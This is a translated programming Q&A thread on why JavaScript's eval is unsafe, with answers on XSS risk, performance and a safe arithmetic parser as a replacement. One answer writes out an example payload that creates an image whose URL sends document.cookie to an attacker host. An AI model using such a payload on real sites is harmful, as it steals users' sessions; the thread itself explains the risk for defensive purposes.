Why is using "eval" in JavaScript considered unsafe?

In the world of JavaScript developers, there is a well-established phrase:

"Eval is evil"

Why and in what cases is the use of eval in JavaScript unsafe? If JavaScript is executed on the client side, how can an attacker hack the site?

The standard developer tools of many browsers allow you to execute code: anyone can run JavaScript, for example in Google Chrome, by entering it in the console.

That is, as it seems to me (superficially), the only thing an attacker can do is harm himself, because only he can see his changes. However, there is an opinion that eval can be used to steal other users' personal data. What is the mechanism?

Why is eval considered an unsafe method? If anyone knows what specific threat this method can pose, please describe the situation and provide example code.

Author: El cero, 2015-09-14

2 answers

Well, look. Let's say we wrote a calculator in which you can register and exchange formulas (i.e. there is a server part where at least user credentials are stored). The attacker's goal is to gain access to a user's account, or to the administrator's account on this resource.

The calculator itself works like this: when you press any digit or operator key, we append it to the string expr, so we end up with:

expr = '5 + 2 * 3';

When we press the "=" key, the following is executed:

var result = eval(expr);

Hacking stage: if an attacker sends a formula that contains JavaScript code in addition to the mathematical content, then the person it is sent to will run the malicious script along with the formula. The formula received from the attacker may look like this:

expr = '(document.createElement("img")).src="http://hacker885.ru/sniff?c=" + document.cookie, 5 + 2 * 3';

As a result, the attacker will be able to obtain cookies, access local/session storage and the content of the page, and try to download something (for example, a virus).

Plus: if we send such a message to the resource administrator in this way, then thanks to the rights obtained we may be able to get into the resource's backend.

Instead of a calculator, it could be something more substantial: for example, an e-learning portal.

Something like that)


P.s.

A little off-topic, but I want to touch on it because it comes up.

To be honest, it is difficult to find a problem where eval would really be necessary; everything I have come across was something like a calculator or a visualizer of mathematical formulas.

I can say that writing a parser for mathematical expressions is not difficult. In my spare time I sketched one: http://jsfiddle.net/kadymov/6d79wmfg/4/ . It is a little unfinished, but it already works, and it takes 150 lines.

Use specific tools for specific tasks; eval, if it stays anywhere at all, should only be at the prototype stage.

 10
Author: Aleksander K., 2016-08-16 15:23:47
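As an added example (not code from either answer, and not the parser linked above), this is the kind of expression parser the answer recommends instead of eval(expr): a tokenizer plus a recursive-descent evaluator that accept only arithmetic, so a formula carrying document.cookie is rejected while tokenizing rather than executed. The names tokenize(), evaluateTokens() and safeCalc() are chosen here, not taken from the page.

```javascript
// Added example (not from the original answers): a replacement for eval(expr) in
// the calculator above. A tokenizer plus a recursive-descent evaluator (expr ->
// term -> primary) accept only numbers, + - * /, unary minus and parentheses.

function tokenize(src) {
  const tokens = [];
  const re = /\s*(\d+(?:\.\d+)?|[-+*\/()])/y; // sticky: no gaps between tokens
  for (let pos = 0; pos < src.length; pos = re.lastIndex) {
    re.lastIndex = pos;
    const m = re.exec(src);
    if (!m) throw new Error(`Unexpected input at position ${pos}`);
    tokens.push(m[1]);
  }
  return tokens;
}

function evaluateTokens(tokens) {
  let i = 0;
  const peek = () => tokens[i];
  function primary() {
    const t = tokens[i++];
    if (t === undefined) throw new Error('Unexpected end of expression');
    if (/^\d/.test(t)) return Number(t);
    if (t === '-') return -primary(); // unary minus
    if (t === '(') {
      const v = expr();
      if (tokens[i++] !== ')') throw new Error('Expected ")"');
      return v;
    }
    throw new Error(`Unexpected token "${t}"`);
  }
  function term() {
    let v = primary();
    while (peek() === '*' || peek() === '/') {
      v = tokens[i++] === '*' ? v * primary() : v / primary();
    }
    return v;
  }
  function expr() {
    let v = term();
    while (peek() === '+' || peek() === '-') {
      v = tokens[i++] === '+' ? v + term() : v - term();
    }
    return v;
  }
  const result = expr();
  if (i !== tokens.length) throw new Error('Trailing input after expression');
  return result;
}
function safeCalc(src) { return evaluateTokens(tokenize(src.trim())); }
```

safeCalc('5 + 2 * 3') returns 11, while the attacker's formula from the answer throws in tokenize() at the first character of "document", before anything is evaluated.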
  1. Eval of verified data is not harmful in terms of security.
  2. Not all the data that seems to be verified is such.
    For example, the server may send something written by another user that contains a malicious script. Or the parameters may be taken from the URL, or even from its hash fragment. Getting to such a page only takes following a simple link, and the code of whoever posted the link will be executed on a page of your domain.
  3. Eval reduces performance. And modern browsers are very focused on optimization, almost to the level of compilation into native code.
    One direct call to eval and that's the end of it.
    Any function that contains a direct eval call cannot be optimized by the browser, because the code is executed in its context. It will have to retain access to all variables higher up the chain of closures, quite possibly extending the life of what should have been collected by the garbage collector.
  4. An indirect eval call executes code in a global context.
    A common use case is getting a global object.
  5. In most cases, the eval call can be replaced with new Function.
  6. Why would you want to use eval?
    It is very likely that there is a better option for this.
 4
Author: Qwertiy, 2015-09-15 14:56:39